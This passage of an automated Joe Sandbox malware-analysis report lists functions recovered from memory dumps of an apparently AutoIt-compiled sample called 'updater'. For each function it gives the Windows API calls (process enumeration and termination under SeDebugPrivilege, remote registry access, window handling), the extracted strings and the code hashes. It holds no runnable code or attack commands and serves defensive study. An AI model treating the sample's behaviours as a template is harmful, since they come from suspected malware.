Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 681eabcb86f727fe8f26e56437c4d1095825f22e10f583b721942169bfb74208
Instruction ID: c8c7ae6369f3cefda1aa06f9355ca5096e9ab49d3e7ff153cac0a8502a0c8ad1
Opcode Fuzzy Hash: 681eabcb86f727fe8f26e56437c4d1095825f22e10f583b721942169bfb74208
Instruction Fuzzy Hash: C9C1C371A0022A9FDF14DF98E884BAEB7F5FB48310F148569E915EB680E770DE44CB91

Function 00C297FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C29851
VariantInit.OLEAUT32(?), ref: 00C29922
VariantInit.OLEAUT32(?), ref: 00C29A23
VariantClear.OLEAUT32(?), ref: 00C29A2D
VariantClear.OLEAUT32(?), ref: 00C29A8A

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00C29A06
Null Object assignment in FOR..IN loop, xrefs: 00C298B2, 00C299E0, 00C29A98

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 93e9d2e2fdad5df27b0954703ca9b06906e06ffcf2ab78d053bef6df54d20e0e
Instruction ID: eb2be57f2edbbb1bc67ddef2594a1f7cdf593811b7e07824d49905e44f688541
Opcode Fuzzy Hash: 93e9d2e2fdad5df27b0954703ca9b06906e06ffcf2ab78d053bef6df54d20e0e
Instruction Fuzzy Hash: 50917071A00229EBDF24DFA5D844FAEB7B8EF45720F10855DF519AB281D7709A44CFA0

Function 017B8945 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,017B8C10,?,?,00000000,00000000), ref: 017B897B

Part of subcall function 017B7149: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 017B7167

Strings

:mm:ss, xrefs: 017B8BCB
AMPM, xrefs: 017B8B8F
AMPM , xrefs: 017B8B9E
mmmm d, yyyy, xrefs: 017B8A77
m/d/yy, xrefs: 017B8A4A
:mm, xrefs: 017B8BAE

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 00dbe14f9a6c5fb61474c8ab1f5935db2162c3fa3b0f48bda58d605570990300
Instruction ID: 1db9c39f65f9ebfc22e7885ab776b39cabd8959506cf0076a59c1c8cc8143f38
Opcode Fuzzy Hash: 00dbe14f9a6c5fb61474c8ab1f5935db2162c3fa3b0f48bda58d605570990300
Instruction Fuzzy Hash: DF615F7070520A9BDB05EBA5ECD4BDEF7BAAB98300F149479A501AB28DDB34D9058722

Function 00C373A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C37449
SendMessageW.USER32(?,00001036,00000000,?), ref: 00C3745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C37477
_wcscat.LIBCMT ref: 00C374D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00C374E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C37517

Strings

SysListView32, xrefs: 00C3741B

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: b49bd3518648127305d3365478653a0f01a1b47fab6f1bae9151cfa9bb9f0056
Instruction ID: c66e4e42c363fb1ac91570c24f8ba5e913418a8daf0ea71e93ed633b12603187
Opcode Fuzzy Hash: b49bd3518648127305d3365478653a0f01a1b47fab6f1bae9151cfa9bb9f0056
Instruction Fuzzy Hash: 0B41D371914348AFEB319F64CC85BEEB7E8EF08350F10452AFA95A7291D2719D84CB60

Function 017BAE49 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 017BAEE2
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 017BAEFE
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 017BAF37
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 017BAFC3
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 017BAFE2
VariantCopy.OLEAUT32(?), ref: 017BB017

Strings

, xrefs: 017BAE63

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-3916222277
Opcode ID: d86e1f33596d4aef53c3cfaa159972970693b9ff1c5b14be54ccb225d1272e81
Instruction ID: 0a785ac46abe3daed103913666640424790a304aa4b83e98ef18f10e4b12a277
Opcode Fuzzy Hash: d86e1f33596d4aef53c3cfaa159972970693b9ff1c5b14be54ccb225d1272e81
Instruction Fuzzy Hash: FF51B5B5A0022E9FCB62EB58C8D4BD9F3FCAF5C200F4041D5A659A7215DB70AF858F60

Function 00C2F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00C14148: CreateToolhelp32Snapshot.KERNEL32 ref: 00C1416D
Part of subcall function 00C14148: Process32FirstW.KERNEL32(00000000,?), ref: 00C1417B
Part of subcall function 00C14148: CloseHandle.KERNEL32(00000000), ref: 00C14245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2F08D
GetLastError.KERNEL32 ref: 00C2F0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2F0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 00C2F14C
GetLastError.KERNEL32(00000000), ref: 00C2F157
CloseHandle.KERNEL32(00000000), ref: 00C2F18C

Strings

SeDebugPrivilege, xrefs: 00C2F0AB

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 0df4a8b133388a6a22514e4df6bd1dbbc8ee556561c574807b883c4b2ec840b8
Instruction ID: 18cf0035e207ab286a326767e592a3b0f44fc2d18c9dbe200077e298b0cd6695
Opcode Fuzzy Hash: 0df4a8b133388a6a22514e4df6bd1dbbc8ee556561c574807b883c4b2ec840b8
Instruction Fuzzy Hash: 7A41AA312042059FD725EF24DCA5FBEB7A1AF80714F14846CF9468B2D3CBB0A915DB95

Function 00BC56F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C00C5B

Part of subcall function 00BC1821: _memmove.LIBCMT ref: 00BC185B

_memset.LIBCMT ref: 00BC5787
_wcscpy.LIBCMT ref: 00BC57DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BC57EB
__swprintf.LIBCMT ref: 00C00CD1

Strings

AutoIt - , xrefs: 00BC5760
Line %d: , xrefs: 00C00CCB

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt -
API String ID: 230667853-4094128768
Opcode ID: 06eb3baf61f0912e641a93dc99cf083d2d56abd5028f5ee8bba6aa882f113135
Instruction ID: 3ff88b15875f4e53a6d19f2316c5acb03524a4eaa92bcf13db8b7cf4fe820c31
Opcode Fuzzy Hash: 06eb3baf61f0912e641a93dc99cf083d2d56abd5028f5ee8bba6aa882f113135
Instruction Fuzzy Hash: FB41C471008304AAD321EB64DC85FDF77ECAF45350F104A6EF599921A2EF74A689CB93

Function 00C134DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00C1357C

Strings

question, xrefs: 00C13535
info, xrefs: 00C1351D
stop, xrefs: 00C1354D
warning, xrefs: 00C13565
blank, xrefs: 00C134FE

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: f776ad509b5c22b5b7892c40328b668118bc82dce7b9258897683a8e92e07111
Instruction ID: 49776bf2c11f59f10c395fe35a1fa3c638dc1d06bc859c1aeea5ac1b4402d4c4
Opcode Fuzzy Hash: f776ad509b5c22b5b7892c40328b668118bc82dce7b9258897683a8e92e07111
Instruction Fuzzy Hash: BC115B35649387BEA7004A15DCC2DEE77DCDF07B68B20006AFA10A6282E7746FC026A1

Function 017AE925 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(017CC325), ref: 017AE954
LocalFree.KERNEL32(0175AC58,00000000,017AEA19), ref: 017AE966
VirtualFree.KERNEL32(?,00000000,00008000,0175AC58,00000000,017AEA19), ref: 017AE98A
LocalFree.KERNEL32(00000000,?,00000000,00008000,0175AC58,00000000,017AEA19), ref: 017AE9DB
RtlLeaveCriticalSection.NTDLL(017CC325), ref: 017AEA09
RtlDeleteCriticalSection.NTDLL(017CC325), ref: 017AEA13

Strings

<, xrefs: 017AE9D2

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: <
API String ID: 3782394904-4251816714
Opcode ID: 7d3e088e8a13324d667ee8f191c82836aef332360ee4d236a3b2c80c06ef540a
Instruction ID: 3e35329e83a847b4f8b7ff30a0295984dca925b3819c4452c37b536b21ac4e1a
Opcode Fuzzy Hash: 7d3e088e8a13324d667ee8f191c82836aef332360ee4d236a3b2c80c06ef540a
Instruction Fuzzy Hash: 7421C174A04344EFDB63DBACE459B59FBE4E789710F90859DE108D7294DA309B40CB22

Function 00C147E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C14802
LoadStringW.USER32(00000000), ref: 00C14809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C1481F
LoadStringW.USER32(00000000), ref: 00C14826
_wprintf.LIBCMT ref: 00C1484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C1486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C14847

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 7408659c659c286654f1dea0e1ec03d63192f791b595f329651c856109c81fcd
Instruction ID: afa3ba0fcf38380b645735fcdb02d0c5c14d11db3f2b3079f2732dc7a8e4d7e5
Opcode Fuzzy Hash: 7408659c659c286654f1dea0e1ec03d63192f791b595f329651c856109c81fcd
Instruction Fuzzy Hash: F60162F69402087FE751D7A09D89FFA777CF709301F5005A5BB4AE2041EA749E844B75

Function 017B0AF9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,017B0BC3,?,?,?,?,?,?,?,017B0C6F,017AF804), ref: 017B0B32
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,017B0BC3,?,?,?,?,?,?,?,017B0C6F), ref: 017B0B38
GetStdHandle.KERNEL32(000000F5,017B0B81,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,017B0BC3), ref: 017B0B4D
WriteFile.KERNEL32(00000000,000000F5,017B0B81,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,017B0BC3), ref: 017B0B53
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 017B0B71

Strings

Error, xrefs: 017B0B65
Runtime error at 00000000, xrefs: 017B0B2B, 017B0B6A

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: b65fea8a367841e634a711122a2e31aad49d0dfb9973a09eb6204f05551be72c
Instruction ID: ffdec7706422e9473cb126204da8e58479bb2501aeaf5552ba54288ef81e482b
Opcode Fuzzy Hash: b65fea8a367841e634a711122a2e31aad49d0dfb9973a09eb6204f05551be72c
Instruction Fuzzy Hash: 42F0BBE0A983467DF930ABE49C4BF97A76C8794F26F50824DB350A70CDD7E148C05752

Function 00C3DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BB29F3

GetSystemMetrics.USER32(0000000F), ref: 00C3DB42
GetSystemMetrics.USER32(0000000F), ref: 00C3DB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C3DD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C3DDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C3DDDC
ShowWindow.USER32(00000003,00000000), ref: 00C3DDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 00C3DE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 00C3DE43

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: ecf13db8a6b50f4e01d7cc2acd35de3292347e4c7c86afa7d3e47ab675057999
Instruction ID: d7a0fdd8410d2a2f5657453615fbdb7d2f79fe89ac1249d17c54d63458a765b1
Opcode Fuzzy Hash: ecf13db8a6b50f4e01d7cc2acd35de3292347e4c7c86afa7d3e47ab675057999
Instruction Fuzzy Hash: 94B1AA35610219EFCF14CF69D9C57AD7BB1FF04701F088069ED5AAE295D730AA90CBA0

Function 00C30371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

Part of subcall function 00C3147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3040D,?,?), ref: 00C31491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C3044E

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 7fab9021f3a14739d4d6887779d7f5b2272ad7aa3993d300c15b4cdd91817db2
Instruction ID: 75a775de78cfa9469f3505407afd1c2c0f0aabde1bf434ba37c971c4c9763d4e
Opcode Fuzzy Hash: 7fab9021f3a14739d4d6887779d7f5b2272ad7aa3993d300c15b4cdd91817db2
Instruction Fuzzy Hash: 01A165712042019FCB10EF24C891F6EBBF5BF84314F24895CF9969B2A2DB71EA55CB42

Function 00BB2E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000024,?,00000000,00000000,?,00BEC508,00000004,00000000,00000000,00000000), ref: 00BB2E9F
ShowWindow.USER32(00000024,00000000,00000000,00000000,?,00BEC508,00000004,00000000,00000000,00000000,000000FF), ref: 00BB2EE7
ShowWindow.USER32(00000024,00000006,00000000,00000000,?,00BEC508,00000004,00000000,00000000,00000000), ref: 00BEC55B
ShowWindow.USER32(00000024,?,00000000,00000000,?,00BEC508,00000004,00000000,00000000,00000000), ref: 00BEC5C7

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: d141338c749b0124dfb1ea6120ddb517752350ff44d1c7976cdc63a19de84bf0
Instruction ID: 8dd5574151584ef76447754a9e9f3c19fb272675927a44d3635819e908147972
Opcode Fuzzy Hash: d141338c749b0124dfb1ea6120ddb517752350ff44d1c7976cdc63a19de84bf0
Instruction Fuzzy Hash: E241B3346046C09BD7358B2A89CDBFE7ED2FB96310F2444CDE94B466A1C7B5E881D711

Function 00C17681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00C17698

Part of subcall function 00BD0FE6: std::exception::exception.LIBCMT ref: 00BD101C
Part of subcall function 00BD0FE6: __CxxThrowException@8.LIBCMT ref: 00BD1031

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C176CF
EnterCriticalSection.KERNEL32(?), ref: 00C176EB
_memmove.LIBCMT ref: 00C17739
_memmove.LIBCMT ref: 00C17756
LeaveCriticalSection.KERNEL32(?), ref: 00C17765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C1777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00C17799

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: d29ce7bc9c59f9d5bc839b2644c840c3bd86f5f60b63442d327c996b16497349
Instruction ID: b3ed613d6dc4b0129f8deaabb0d775ae9b80ffbfb826c2e5ad6819b8dbb57e8e
Opcode Fuzzy Hash: d29ce7bc9c59f9d5bc839b2644c840c3bd86f5f60b63442d327c996b16497349
Instruction Fuzzy Hash: 9F31A135904104EBCB10EF94DC85FAEBBB8FF46300F2441A6F904AB296D7709E50DBA0

Function 00C367F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C36810
GetDC.USER32(00000000), ref: 00C36818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C36823
ReleaseDC.USER32(00000000,00000000), ref: 00C3682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C3686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C3687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C3964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00C368B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C368D6

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 695109d5dfe0e036aea1603efd67235e0be2512aa99e9be6e3782b71f66d2191
Instruction ID: 100c3c22b64a22e93d659250cc1b3b445fea7234ab75703106c88f3bf06ab068
Opcode Fuzzy Hash: 695109d5dfe0e036aea1603efd67235e0be2512aa99e9be6e3782b71f66d2191
Instruction Fuzzy Hash: C7318B76151210BFEB108F50CC8AFEA3BA9FF4A761F044065FF089A291C6759C51CBB1

Function 00C0C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C0C75D
_memcmp.LIBCMT ref: 00C0C77F
_memcmp.LIBCMT ref: 00C0C797
_memcmp.LIBCMT ref: 00C0C7AA
_memcmp.LIBCMT ref: 00C0C7C4
_memcmp.LIBCMT ref: 00C0C7D7
_memcmp.LIBCMT ref: 00C0C7EF
_memcmp.LIBCMT ref: 00C0C80A

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: fe4a84c1892149397d03223d7d23d880849756722ea9475e6d078545fec8860c
Instruction ID: dc72d2be2682cc37aa89724f8d0040a05777fe16172bcf2a4d087bc7b53d866d
Opcode Fuzzy Hash: fe4a84c1892149397d03223d7d23d880849756722ea9475e6d078545fec8860c
